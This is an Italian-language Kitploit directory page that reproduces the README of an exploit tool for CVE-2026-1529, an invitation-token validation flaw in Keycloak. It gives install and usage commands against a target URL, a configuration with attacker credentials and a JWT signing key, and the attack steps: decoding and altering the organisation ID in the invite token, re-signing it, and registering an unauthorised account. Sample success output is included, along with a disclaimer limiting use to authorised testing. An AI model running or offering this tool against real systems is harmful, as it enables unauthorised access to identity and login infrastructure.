Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-1529 — Keycloak: Registrazione non autorizzata dell'organizzazione tramite una convalida impropria del token di invito | Kitploit
Strumenti/GitHubGitHub/0x240x23elu/cve-2026-1529
Autenticazione e AutorizzazioneGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHub0x240x23elu/cve-2026-1529

CVE-2026-1529

Keycloak: Registrazione non autorizzata dell'organizzazione tramite una convalida impropria del token di invito

Vedi Repository
62177 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumento Exploit CVE-2026-1529 per Keycloak

Python Version License Status

CVE-2026-1529: Keycloak - Registrazione non autorizzata di organizzazioni tramite una validazione impropria del token di invito

⚠️ AVVISO: Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale.

📋 Indice

  • Panoramica
  • Funzionalità
  • Prerequisiti
  • Installazione
  • Utilizzo
  • Configurazione
  • Come Funziona
  • Output
  • Risoluzione dei Problemi
  • Disclaimer Legale
  • Contributi
  • Crediti

🎯 Panoramica

Questo strumento dimostra una vulnerabilità critica in Keycloak (CVE-2026-1529) che consente la registrazione non autorizzata di organizzazioni tramite una validazione impropria del token di invito JWT. L'exploit manipola i token di invito per ottenere accesso non autorizzato alle istanze Keycloak.

Dettagli della Vulnerabilità:

  • ID CVE: CVE-2026-1529
  • Gravità: Critica
  • Vettore di Attacco: Rete
  • Complessità dell'Attacco: Bassa
  • Sistemi Interessati: Istanze Keycloak con funzionalità di invito alle organizzazioni

✨ Funzionalità

  • ✅ Rilevamento automatico della vulnerabilità
  • ✅ Manipolazione del token JWT
  • ✅ Registrazione utente automatizzata
  • ✅ Verifica del login
  • ✅ Report dettagliati dell'exploit
  • ✅ Parametri configurabili
  • ✅ Supporto per logging di debug
  • ✅ Client HTTP con multi-retry

📦 Prerequisiti

  • Python 3.7 o superiore
  • pip (gestore di pacchetti Python)
  • Ambiente virtuale (consigliato)
  • Istanza Keycloak di destinazione (solo test autorizzati)

🚀 Installazione

Metodo 1: Clonazione del Repository

# Clona il repository
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit

# Crea l'ambiente virtuale
python3 -m venv venv
source venv/bin/activate  # Su Windows: venv\Scripts\activate

# Installa le dipendenze
pip install -r requirements.txt

Metodo 2: Configurazione Manuale

# Crea la struttura delle directory
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit

# Scarica i file dalle release o copiali manualmente
# Poi installa le dipendenze
pip install requests urllib3 PyJWT

Struttura dei File

keycloak-exploit/
├── keycloak-exploit.py           # Script principale dell'exploit
├── requirements.txt              # Dipendenze Python
├── README.md                     # Questo file
├── config/
│   └── default_config.json       # File di configurazione
├── utils/
│   ├── __init__.py              # Inizializzatore del pacchetto
│   ├── http_utils.py            # Utility client HTTP
│   ├── jwt_utils.py             # Manipolazione JWT
│   └── crypto_utils.py          # Utility crittografiche
├── logs/                         # Log generati automaticamente
└── output/
    └── reports/                  # Report dell'exploit

💻 Utilizzo

Utilizzo Base

python3 keycloak-exploit.py https://target-keycloak.com

Opzioni Avanzate

# Con token di invito personalizzato
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com

# Con ID organizzazione personalizzato
python3 keycloak-exploit.py -o custom_org_id https://target.com

# Con file di configurazione personalizzato
python3 keycloak-exploit.py -c /path/to/config.json https://target.com

# Abilita il logging di debug
python3 keycloak-exploit.py -d https://target.com

# Mostra l'aiuto
python3 keycloak-exploit.py -h

# Mostra la versione
python3 keycloak-exploit.py -v

Argomenti della Riga di Comando

ArgomentoBreveDescrizione
target-URL Keycloak di destinazione (obbligatorio)
--token-tToken di invito personalizzato
--org-id-oID organizzazione personalizzato
--config-cPercorso del file di configurazione
--debug-dAbilita il logging di debug
--version-vMostra le informazioni sulla versione
--help-hMostra il messaggio di aiuto

⚙️ Configurazione

Modifica config/default_config.json per personalizzare i parametri dell'exploit:

{
    "exploit": {
        "default_username": "admin_user_2026",
        "default_password": "KeycloakCVE2026!",
        "default_email": "[email protected]",
        "timeout": 30,
        "max_retries": 3
    },
    "jwt": {
        "algorithm": "HS256",
        "secret_key": "keycloak-cve-2026-1529-exploit",
        "token_expiry": 3600
    },
    "target": {
        "endpoints": {
            "realms": "/realms",
            "organizations": "/organizations",
            "register": "/register",
            "login": "/login"
        }
    },
    "output": {
        "log_level": "INFO",
        "save_reports": true,
        "report_format": "txt"
    }
}

Opzioni di Configurazione

SezioneParametroDescrizionePredefinito
exploitdefault_usernameNome utente per la registrazioneadmin_user_2026
exploitdefault_passwordPassword per la registrazioneKeycloakCVE2026!
exploitdefault_emailEmail per la registrazione[email protected]
exploittimeoutTimeout richiesta HTTP (secondi)30
exploitmax_retriesNumero massimo di retry HTTP3
jwtalgorithmAlgoritmo di firma JWTHS256
jwtsecret_keyChiave segreta JWTPersonalizzata
jwttoken_expiryScadenza del token (secondi)3600

🔧 Come Funziona

L'exploit funziona nei seguenti passaggi:

  1. Verifica della Vulnerabilità

    • Si connette all'istanza Keycloak di destinazione
    • Rileva la versione di Keycloak
    • Testa gli endpoint delle organizzazioni
  2. Generazione/Manipolazione del Token

    • Genera o accetta il token di invito
    • Decodifica il token JWT
    • Manipola l'ID dell'organizzazione nel payload
    • Ri-firma il token con la chiave nota
  3. Registrazione Utente

    • Invia la registrazione con il token manipolato
    • Bypassa la validazione dell'organizzazione
    • Crea un account utente non autorizzato
  4. Verifica del Login

    • Testa il login con le credenziali create
    • Genera un token di accesso
    • Fornisce l'URL di login
  5. Generazione del Report

    • Crea un report dettagliato dell'exploit
    • Salva in output/reports/
    • Include tutti i dettagli tecnici

Diagramma del Flusso di Attacco

┌─────────────────┐
│  Verifica Target│
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Gen/Ottieni    │
│  Token          │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Manipolazione   │
│ Token           │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Registrazione   │
│ Utente          │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Test Login     │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Gen. Report    │
└─────────────────┘

📊 Output

Output di Exploit Riuscito

============================================================
RISULTATI EXPLOIT CVE-2026-1529
============================================================
✓ Il target è vulnerabile a CVE-2026-1529

🎯 EXPLOIT RIUSCITO!
Nome utente: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Link di Login: https://target.com/realms/master/account

📄 Report salvato in: output/reports/exploit_report_20260211_050507.txt
Scarica lo strumento